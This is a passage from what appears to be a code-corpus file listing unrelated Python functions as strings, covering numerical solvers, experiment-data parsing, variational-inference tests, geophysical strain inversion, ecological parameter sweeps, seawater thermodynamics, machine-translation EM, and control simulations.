self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_generate_nb(self):\n pass", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). 
They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def _r_inv(self):\n raise NotImplementedError", "def calc_T_sys(nu_obs):\n return 100 * u.K + 120 * (nu_obs / (150 * u.MHz))**(-2.55) * u.K", "def run_test(d):\n\n ######### Problem Specification\n\n # Data generation parameters\n prior_mu_z = np.zeros(d, dtype=np.float32) # Prior mean\n prior_sigma_z = np.eye(d, dtype=np.float32) # Prior covariance matrix\n\n # True model parameters\n num_range = np.arange(-(d-1)/2, (d+1)/2, dtype=np.float32)\n\n t_delta = num_range / 5 \n\n if d == 1:\n t_sigma = np.ones(1)\n else: \n # Allow sigma to range from 0.1 to 1\n t_sigma = 36/(10*(d-1)**2) * num_range**2 + 0.1 \n\n ######### Variable Initialization\n\n # Initial model parameters - same across all methods\n init_delta = prior_mu_z.copy()\n init_log_sigma = 3 * np.ones(d)\n\n # Initial HVAE variational parameters\n init_T = 5.\n init_eps = 0.005 * np.ones(d)\n max_eps = params['max_eps'] * np.ones(d)\n init_logit_eps = np.log(init_eps/(max_eps - init_eps))\n init_log_T_0 = np.log(init_T - 1)\n\n # Initial NF variational parameters\n init_u_pre_reparam = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_w = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_b = 0.1\n\n # Initial VAE parameters\n init_mu_z = prior_mu_z.copy()\n init_log_sigma_z = np.ones(d)\n\n ######### Set up models\n\n HVAE_model_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_1', d, params['HVAE_K_1'])\n HVAE_model_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_2', d, params['HVAE_K_2'])\n\n HVAE_model_notemp_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'],\n [init_delta, init_log_sigma, init_logit_eps], \n 'HVAE_notemp_1', d, params['HVAE_K_1'])\n HVAE_model_notemp_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'], \n [init_delta, init_log_sigma, init_logit_eps],\n 'HVAE_notemp_2', d, params['HVAE_K_2'])\n\n NF_model_1 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_1', d, params['NF_K_1'])\n NF_model_2 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_2', d, params['NF_K_2'])\n\n VB_model = VB(['delta', 'log_sigma', 'mu_z', 'log_sigma_z'], \n [init_delta, init_log_sigma, init_mu_z, init_log_sigma_z], 'VB', d)\n\n model_list = [HVAE_model_1, HVAE_model_2, HVAE_model_notemp_1, \n HVAE_model_notemp_2, NF_model_1, NF_model_2, VB_model]\n \n ######### Generate Training Data & Save - One for each test\n\n train_data_list = []\n\n for i in range(params['n_tests']):\n z = np.random.multivariate_normal(prior_mu_z, prior_sigma_z)\n x = np.random.multivariate_normal(z + t_delta, np.diag(t_sigma**2), \n size=params['n_data'])\n train_data_list.append(x)\n\n # Folder should have already been created in the 
initializations\n data_path = os.path.join('save', str(d), 'train_data.p')\n pickle.dump(train_data_list, open(data_path, 'wb')) \n\n ######### Train models\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n # Store the final parameter values for all test runs in this dictionary\n final_params = {}\n\n for m in model_list:\n\n final_values = []\n\n for i in range(params['n_tests']):\n (delta, sigma) = m.train(sess, train_data_list[i], i)\n final_values.append((delta, sigma))\n\n final_params[m.model_name] = final_values.copy()\n\n ######### Test models using difference between parameters\n\n param_diffs = {}\n\n for m in model_list:\n\n diffs = []\n\n for i in range(params['n_tests']):\n delta = final_params[m.model_name][i][0]\n sigma = final_params[m.model_name][i][1]\n\n delta_diff = np.sum((delta - t_delta)**2)\n sigma_diff = np.sum((sigma - t_sigma)**2)\n\n diffs.append((delta_diff, sigma_diff))\n\n param_diffs[m.model_name] = diffs.copy()\n\n # Save parameter differences in a pickle file\n diff_path = os.path.join('save', str(d), 'all_diffs.p')\n pickle.dump(param_diffs, open(diff_path, 'wb'))", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in 
range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def mscb(t):\n\treturn int(np.log2(t ^ (t + 1)))", "def FigA7(case):\n \n #set the parameter, arrays\n \n n_array=np.array([1,2,3])\n\n #set the result arrays\n if case==0:\n class_number=5\n elif case==1:\n class_number=6\n fate=np.zeros([class_number])#number of evolutionary fate\n fate_matrix=np.zeros([np.size(n_array),np.size(fate)])\n \n time=np.linspace(0,100000, 1000000)\n loop=10**6\n \"\"\"\n 0 Co and/or Ch cannot survive in mono-culture\n 1 Co cannot invade\n 2 Only equilibrium of exclusion is stable\n 3 Only equilibrium of coexistence is stable\n 4 Two equilibria are UNstable\n 5 two Equilibrium are stable (which may occur only when sCO vs rCh)\n \"\"\"\n for tri in range(np.size(n_array)):\n counter=0\n n=n_array[tri]\n print(str(\"Hill coefficient is %d\" %(n)))\n fate=np.zeros([class_number])#number of evolutionary fate should be reset\n if case==0 or case==1:\n fname=str('parameter-sweep-MC-n%d-case%d' %(n, case))\n else:\n print(\"Error in case\")\n return 1\n \n for i in range(loop):\n if(i+1)%10000==0:\n print(i+1)\n Ks,cd,T0, alpha,=np.random.uniform(0,1,4)\n Kr,cr=np.random.uniform([Ks,0],[1,1],2)#Kr>Ks and cr.cd\n #check whether r is positive or not\n if case==0:\n r1=rmax*(1-cr-cd)#rCO\n r2=rmax#sCH\n W0Co=r1-dmax*T0**n/(T0**n+Kr**n)-alpha#initial growth of Cooperator\n W0Ch=r2-dmax*T0**n/(T0**n+Ks**n)-alpha#initial growth of Cheater\n elif case==1:\n r1=rmax*(1-cd)#sCo\n r2=rmax*(1-cr)#rCh\n W0Co=r1-dmax*T0**n/(T0**n+Ks**n)-alpha\n W0Ch=r2-dmax*T0**n/(T0**n+Kr**n)-alpha\n stab_e=0#initialize the falgs of stability\n stab_c=0\n if W0Co<0 or W0Ch<0:\n fate[0]+=1\n res=0\n else:\n #succeed in mono-culture \n init=np.array([T0,10**(-6)])\n if case==0: \n solCo=odeint(DyCoop, init, time, args=(T0, r1, Kr, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Ks, alpha, n))\n x2s=solCh[-1,1]\n else:\n solCo=odeint(DyCoop, init, time, args=(T0, r1, Ks, alpha, n))\n Ts=solCo[-1,0]\n #x1s=solCo[-1,1]\n solCh=odeint(DyCheat, init, time, args=(T0, r2, Kr, alpha, n))\n x2s=solCh[-1,1]\n \n #Evolutionary dynamics \n if case==0:\n K=Kr\n else:\n K=Ks\n if r1*(1-x2s)-dmax*T0**n/(T0**n+K**n)<alpha:\n #Co cannot invade\n fate[1]+=1\n res=1\n else:\n #Co can invade\n #calculate Tdagger Td and check whether coexist or exclude\n if case==0:\n #rCo vs sCh\n #in this case, at most one equilbrium is stable\n tau=Quad(case,alpha,cr+cd,0,Kr, Ks, n)\n Td=tau**(1/n)\n 
if Td<Ts:\n #Co exclude Ch\n fate[2]+=1\n res=2\n else:\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #unstable coexistence nor exclusion\n fate[4]+=1\n res=4\n print(Td, x1d, x2d)\n else:\n #sCo vs rCh\n # in this case two equilibria can be stable at the same time\n [tau_p,tau_m]=Quad(case,alpha,cd,cr,Ks, Kr, n)\n if tau_m>Ts**n or tau_p<Ts**n:\n # cexclusion is stable\n stab_e=1\n # stability in coexistence \n if tau_p<0:\n stab_c=0\n else:\n Td=tau_p**(1/n)\n x1d=alpha*Kd*(T0-Td)/(fmax*Td-alpha*(T0-Td))\n x2d=1-x1d-(dmax*Td**n/(Td**n+K**n)+alpha)/r1\n #check the stability condition\n stab=Stab_cond(alpha, T0, Td,x1d,x2d, r1,r2,n, K)\n if stab==0:\n #stable coexistence\n stab_c=1\n #classify\n if stab_e==1 and stab_c==1:\n # two stable equilbria\n fate[5]+=1\n res=5\n elif stab_e==1 and stab_c==0:\n #only stable cexclusion\n fate[2]+=1\n res=2\n elif stab_e==0 and stab_c==1:\n #stable coexistence\n fate[3]+=1\n res=3\n else:\n #both unstable\n fate[4]+=1\n res=4\n \n #save the results\n if counter==0:\n result=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n #save the result with parameter values\n \n else:\n #add array of results\n R=np.array([[Ks, Kr, cr, cd, alpha, T0,res]])\n result=np.concatenate((result, R), axis=0)\n counter+=1\n \n #save csv file and graph\n np.savetxt(fname+'.csv',result, delimiter=',', header='Ks, Kr, cr, cd, alpha, T0, class', fmt='%.6f') \n print(fate)\n fate_matrix[tri,:]=fate \n if case==0: \n np.savetxt('parameter_sweep_MC_total_case0.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4', fmt='%d')\n else:\n np.savetxt('parameter_sweep_MC_total_case1.csv',fate_matrix, delimiter=',', header='cl0,l1,cl2,cl3,cl4,cl5', fmt='%d')\n Plot(case)", "def prove_I0() -> Proof:\n # Task 4.8", "def t(l3,Ei,Et,Et_axis):\n Ef=Ei-Et\n T=(-(l3/vFrmE(Ef))+(l3/np.sqrt(vFrmE(Ei)**2-vsq_from_E(Et_axis))))*1e6\n return (T)", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def main() -> int:\n ucvm_out = \"\"\n for j in 
frange(CORNERS[\"bl\"][\"n\"], CORNERS[\"ur\"][\"n\"], SPACING):\n for i in frange(CORNERS[\"bl\"][\"e\"], CORNERS[\"ur\"][\"e\"] + SPACING, SPACING):\n ucvm_out += \"%.2f %.2f 0\\n\" % (i, j)\n os.chdir(\"/Users/davidgil/ucvm-15.10.0/bin\")\n proc = Popen(\n [\"./ucvm_query\", \"-f\", \"../conf/ucvm.conf\"], stdout=PIPE, stdin=PIPE, stderr=STDOUT\n )\n out_arr = np.zeros(\n shape=(\n int((CORNERS[\"ur\"][\"n\"] - CORNERS[\"bl\"][\"n\"]) / SPACING) + 2,\n int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING) + 2\n )\n )\n output = proc.communicate(input=ucvm_out.encode(\"ASCII\"))[0]\n i = 0\n j = 0\n for line in output.decode(\"ASCII\").split(\"\\n\")[2:-1]:\n line_split = line.split()\n try:\n out_arr[j][i] = float(line_split[4])\n except IndexError:\n print(line_split)\n if i == int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING):\n i = 0\n j += 1\n else:\n i += 1\n np.save(\"vs30.dat\", out_arr)\n return 0", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def calc_equil(sst, ft_qv, use_NT=False):\n \n run_main(sst, ft_qv, use_NT)\n \n # grab csv file\n with open('dumpmodel.csv','r') as f:\n df_result=pd.read_csv(f)\n\n # last time step into named tupple\n out=df_result.iloc[-1]\n steady_state=make_tuple(out.to_dict())\n steady_state\n \n # obtain steady-state values\n dth=steady_state.deltheta\n dqt=steady_state.delqv\n thetal_m=steady_state.theta\n qt_m=steady_state.qv\n h=steady_state.h\n press=tf.find_press(steady_state.h) #kPa\n thetal_ft = steady_state.theta + dth\n qt_ft = steady_state.qv + dqt\n zb = steady_state.LCL\n zi = steady_state.h\n we = steady_state.went\n \n # calculate thetal at z = 3000 m (take qt(z = 3000m) = qt(z = h), so delta_qt = dqt)\n gamma = 6e-3 \n thetal_3000 = thetal_ft + gamma*(3000-h)\n LTS = thetal_3000 - steady_state.theta\n \n # calculate delta_Fr\n delta_Frstar = 82.0 # Wm^-2\n Frlambda = 7.9 # Wm^-2, using with CTL from Gesso\n delta_Fr = delta_Frstar - Frlambda*qt_ft*1000 # convert qt_ft to g kg^-1\n\n # calculate LWP\n rho = 1.\n LWP = 0.5*rho*(zi-zb)**2\n \n # put all required variables into output array\n out_array = np.array([thetal_m, qt_m, zi, zb, we, LWP, delta_Fr, LTS, dqt])\n \n return out_array", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. 
Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def simulation_OFC(self,ncmE,ncmC,f,g,Cfun,h,dt,tf,x0,z0=None,dscale=10.0,\\\n xnames=\"num\",Ncol=1,FigSize=(20,10),FontSize=20,phis=None):\n \"\"\"\n \n \n 1) SIMULATION\n \n \n \"\"\"\n if len(sig(f).parameters) == 1:\n fun1 = f\n f = lambda x,p: fun1(x)\n if len(sig(g).parameters) == 1:\n fun2 = g\n g = lambda x,p: fun2(x)\n if len(sig(Cfun).parameters) == 1:\n fun3 = Cfun\n Cfun = lambda x,p: fun3(x)\n if len(sig(h).parameters) == 1:\n fun4 = h\n h = lambda x,p: fun4(x)\n print(\"========================================================\")\n print(\"====================== SIMULATIOM ======================\")\n print(\"========================================================\")\n if dt <= self.dt_rk:\n self.dt_rk = dt\n self.Nrk = int(dt/self.dt_rk)\n Nsim = int(tf/dt)\n np.set_printoptions(precision=1)\n print(\"time step =\",dt)\n print(\"terminal time =\",tf)\n print(\"initial state =\",x0)\n print(\"estimated initial state =\",z0)\n funx = lambda x,p,dEf: f(x,p)+dEf(x,p)\n z = z0\n zhis = np.zeros((Nsim+1,self.n))\n zhis[0,:] = z\n x = x0\n xhis = np.zeros((Nsim+1,self.n))\n xhis[0,:] = x\n 
tit1 = \"Performance of NCM-based Output Feedback (1)\"\n tit2 = \"Performance of NCM-based Output Feedback (2)\"\n tit3 = \"Performance of NCM-based Output Feedback (3)\"\n tit4 = \"Performance of NCM-based Output Feedback (4)\"\n ly = r\"estimation error: $\\|x-\\hat{x}\\|_2$\"\n l1 = r\"estimation error\"\n lyb = r\"tracking error: $\\|x-x_d\\|_2$\"\n l1b = r\"tracking error\"\n bNam1 = \"=================== ESTIMATION ERROR ===================\"\n bNam2 = \"============ ESTIMATION ERROR OF EACH STATE ============\"\n bNam3 = \"==================== Tracking ERROR ====================\"\n bNam4 = \"============= Tracking ERROR OF EACH STATE =============\"\n l2 = r\"optimal steady-state upper bound\"\n if phis == None:\n phis = np.linspace(self.plims[0,:],self.plims[1,:],Nsim)\n for k in range(Nsim):\n p = phis[k,:]\n Mc = ncmC.ncm(z,p)\n u = -g(z,p).T@Mc@z\n dEfC = lambda x,p: g(x,p)@u\n d1 = self.unifrand2(ncmC.d1_over,np.size(ncmC.Bw(x,p),1))*dscale\n x = self.rk4(x,p,dEfC,funx)+ncmC.Bw(x,p)@d1*dt\n xhis[k+1,:] = x\n Me = ncmE.ncm(z,p)\n Cx = Cfun(z,p)\n Lx = Me@Cx.T\n #Lx = K.T\n d2 = self.unifrand2(ncmE.d2_over,np.size(ncmE.Gw(x,p),1))*dscale\n y = h(x,u,p)+ncmE.Gw(x,p)@d2\n funz = lambda z,p,dEf: f(z,p)+g(z,p)@u+dEf(z,p)\n dEfE = lambda z,p: Lx@(y-h(z,u,p))\n z = self.rk4(z,p,dEfE,funz)\n zhis[k+1,:] = z\n this = np.linspace(0,tf,Nsim+1)\n \"\"\"\n \n \n 2) FIGURE GENERATION\n \n \n \"\"\"\n print(\"========================================================\")\n print(bNam1)\n print(\"========================================================\")\n matplotlib.rcParams.update({\"font.size\": 15})\n matplotlib.rc(\"text\",usetex=True)\n plt.figure()\n plt.plot(this,np.sqrt(np.sum((xhis-zhis)**2,1)))\n plt.plot(this,np.ones(np.size(this))*ncmE.Jcv_opt)\n plt.xlabel(r\"time\",fontsize=FontSize)\n plt.ylabel(ly,fontsize=FontSize)\n plt.legend([l1,l2],loc=\"best\")\n plt.title(tit1,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(bNam2)\n print(\"========================================================\")\n Nrow = int(self.n/Ncol)+np.remainder(self.n,Ncol)\n fig,ax = plt.subplots(Nrow,Ncol,figsize=FigSize)\n plt.subplots_adjust(wspace=0.25,hspace=0.25)\n if Ncol == 1:\n ax = np.reshape(ax,(self.n,1))\n elif Nrow == 1:\n ax = np.reshape(ax,(1,self.n))\n if xnames == \"num\":\n xnames = []\n for i in range(self.n):\n xnames += [r\"state \"+str(i+1)]\n for row in range(Nrow):\n for col in range(Ncol):\n i = Ncol*row+col\n if i+1 <= self.n:\n ax[row,col].plot(this,xhis[:,i]-zhis[:,i])\n ax[row,col].set_xlabel(r\"time\",fontsize=FontSize)\n LabelName = r\"estimation error: \"+xnames[i]\n ax[row,col].set_ylabel(LabelName,fontsize=FontSize)\n fig.suptitle(tit2,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(bNam3)\n print(\"========================================================\")\n matplotlib.rcParams.update({\"font.size\": 15})\n matplotlib.rc(\"text\",usetex=True)\n plt.figure()\n plt.plot(this,np.sqrt(np.sum((xhis)**2,1)))\n plt.plot(this,np.ones(np.size(this))*ncmC.Jcv_opt)\n plt.xlabel(r\"time\",fontsize=FontSize)\n plt.ylabel(lyb,fontsize=FontSize)\n plt.legend([l1b,l2],loc=\"best\")\n 